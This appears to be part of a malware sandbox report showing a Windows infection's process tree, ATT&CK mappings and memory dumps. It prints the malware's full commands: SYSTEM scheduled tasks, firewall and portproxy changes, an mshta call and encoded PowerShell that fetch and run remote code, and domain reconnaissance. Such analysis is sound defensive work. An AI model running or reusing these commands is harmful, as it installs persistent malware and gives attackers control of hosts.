http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:1996
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1324
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:788
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1968
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1748
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:1080
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1856
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo jhbajY >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:844
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1908
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1600
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1660
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1004
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2912
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2952
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo FXvx >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\AQzNdfKa.exe&move /y c:\windows\temp\dig.exe c:\windows\XHHdn.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\XHHdn.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\AQzNdfKa.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:3000
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1624
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2328
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2420
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2820
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo JsfCXd >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\dwnoz.exe&move /y c:\windows\temp\dig.exe c:\windows\DCioaAx.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\DCioaAx.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\dwnoz.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:2328
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:3004
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:3024
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:3084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:3168
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:3300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:456
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2964
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1596
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo pohWckK >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\aAKrYQe.exe&move /y c:\windows\temp\dig.exe c:\windows\ybZokV.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\ybZokV.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\aAKrYQe.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:1636
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:3060
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1004
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2212
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2228
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2188

C:\Windows\system32\taskeng.exe
taskeng.exe {4F89A168-6683-436F-856F-CF330BDAE8DA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\hqLA.exe
  C:\Windows\hqLA.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\hqLA.exe
    C:\Windows\hqLA.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c wmic ntdomain get domainname
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1148
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic ntdomain get domainname
        5⤵
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net localgroup administrators
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup administrators
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1972
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net group "domain admins" /domain
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\net.exe
        
        net group "domain admins" /domain
        5⤵
        
        PID:1828
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 group "domain admins" /domain
        6⤵
        
        PID:1860
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Windows\m2.ps1"
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig /all
      4⤵
      PID:1004
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:956
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:1040
  - - C:\Windows\SysWOW64\netstat.exe
      netstat -na
      4⤵
      Gathers network information
      Suspicious use of AdjustPrivilegeToken
      PID:596

C:\Windows\IvTOEzgJ.exe
C:\Windows\IvTOEzgJ.exe
1⤵
PID:1856

C:\Windows\CHVrgpSt.exe
C:\Windows\CHVrgpSt.exe
1⤵
PID:2016

C:\Windows\udkEbwEl.exe
C:\Windows\udkEbwEl.exe
1⤵
PID:1844

C:\Windows\HDnQjNKm.exe
C:\Windows\HDnQjNKm.exe
1⤵
PID:2248

C:\Windows\RLhjOHLP.exe
C:\Windows\RLhjOHLP.exe
1⤵
PID:864

C:\Windows\maynOwmE.exe
C:\Windows\maynOwmE.exe
1⤵
PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:3108
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:3112

C:\Windows\VAkHJhfp.exe
C:\Windows\VAkHJhfp.exe
1⤵
PID:4036

C:\Windows\gqEalohR.exe
C:\Windows\gqEalohR.exe
1⤵
PID:436

C:\Windows\CPPIxHsB.exe
C:\Windows\CPPIxHsB.exe
1⤵
PID:3388

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/384-6-0x00000000003B0000-0x00000000003BC000-memory.dmp

Filesize
48KB

Download
memory/384-3-0x00000000011F0000-0x00000000011F1000-memory.dmp

Filesize
4KB

Download
memory/384-5-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

Filesize
4KB

Download
memory/384-2-0x0000000074390000-0x0000000074A7E000-memory.dmp

Filesize
6.9MB

Download
memory/384-82-0x00000000051F0000-0x0000000005261000-memory.dmp

Filesize
452KB

Download
memory/384-83-0x00000000005B0000-0x00000000005E1000-memory.dmp

Filesize
196KB

Download
memory/1084-84-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1084-86-0x0000000074390000-0x0000000074A7E000-memory.dmp

Filesize
6.9MB

Download
memory/1084-87-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1084-117-0x00000000010C0000-0x00000000010C1000-memory.dmp

Filesize
4KB

Download
memory/1528-8-0x0000000076241000-0x0000000076243000-memory.dmp

Filesize
8KB

Download
memory/1988-80-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/1988-91-0x00000000194E0000-0x00000000194E1000-memory.dmp

Filesize
4KB

Download
memory/1988-77-0x0000000019530000-0x0000000019532000-memory.dmp

Filesize
8KB

Download
memory/1988-76-0x00000000195B0000-0x00000000195B1000-memory.dmp

Filesize
4KB

Download
memory/1988-75-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/1988-79-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/1988-74-0x000007FEF52C0000-0x000007FEF5CAC000-memory.dmp

Filesize
9.9MB

Download
memory/1988-107-0x000000001A010000-0x000000001A011000-memory.dmp

Filesize
4KB

Download
memory/1988-146-0x000000001953A000-0x0000000019559000-memory.dmp

Filesize
124KB

Download
memory/1988-73-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmp

Filesize
8KB

Download
memory/1988-99-0x0000000019520000-0x0000000019521000-memory.dmp

Filesize
4KB

Download
memory/1988-96-0x0000000019380000-0x0000000019381000-memory.dmp

Filesize
4KB

Download
memory/1988-108-0x000000001AD30000-0x000000001AD31000-memory.dmp

Filesize
4KB

Download
memory/1988-115-0x000000001A040000-0x000000001A041000-memory.dmp

Filesize
4KB

Download
memory/1988-116-0x000000001ADC0000-0x000000001ADC1000-memory.dmp

Filesize
4KB

Download
memory/1988-97-0x0000000019390000-0x0000000019391000-memory.dmp

Filesize
4KB

Download
memory/1988-100-0x0000000019E80000-0x0000000019E81000-memory.dmp

Filesize
4KB

Download
memory/1988-98-0x0000000019E60000-0x0000000019E61000-memory.dmp

Filesize
4KB

Download
memory/1988-78-0x0000000019534000-0x0000000019536000-memory.dmp

Filesize
8KB

Download